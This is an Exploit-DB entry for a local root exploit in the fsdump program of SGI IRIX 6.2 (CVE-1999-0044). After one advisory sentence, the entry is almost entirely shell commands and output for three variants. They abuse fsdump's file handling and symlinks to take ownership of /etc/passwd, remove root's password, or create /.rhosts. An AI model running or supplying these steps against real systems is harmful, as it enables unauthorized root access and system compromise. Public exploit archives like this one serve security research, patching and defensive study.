SGI IRIX 6.2 - 'fsdump' Local Privilege Escalation

EDB-ID:

19280

CVE:

1999-0044

EDB Verified:

Author:

Jaechul Choe

Type:

local

Exploit:   /  

Platform:

IRIX

Date:

1996-12-03

Vulnerable App: 
source: https://www.securityfocus.com/bid/355/info

A number of vulnerabilities exist in the fsdump program included with Silicon Graphics Inc's IRIX operating system. Each of these holes can be used to obtain root privlilege. 

Variant 1:
irix% /var/rfindd/fsdump -L/etc/passwd -F/tmp/dump /
(count to three, and hit ctrl-c)
irix% ls -la /etc/passwd
-rw-r--r-- 1 csh users 956 Feb 25 06:23 /etc/passwd
irix% tail -8 /etc/passwd
nobody:*:60001:60001:SVR4 nobody uid:/dev/null:/dev/null
noaccess:*:60002:60002:uid no access:/dev/null:/dev/null
nobody:*:-2:-2:original nobody uid:/dev/null:/dev/null

Tue Feb 25 06:23:48 PST 1997
Number of inodes total 208740; allocated 31259
Collecting garbage.
interrupted
irix% vi /etc/passwd # remove the encrypted root password
irix% chgrp sys /etc/passwd
irix% chown root /etc/passwd
irix% su -
irix#

Variant 2:

cp /etc/passwd /tmp/passwd
ln -s /etc/passwd rfd.lock
/var/rfindd/fsdump -F/tmp/rfd /
/var/rfindd/fsdump -L/etc/passwd -F/tmp/rfd /

Variant 3:
cd /tmp
ln -s /.rhosts fsdump.dir
/var/rfindd/fsdump -Fgimme /
ls -al /.rhosts
rm -f fsdump.dir fsdump.pag gimme
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services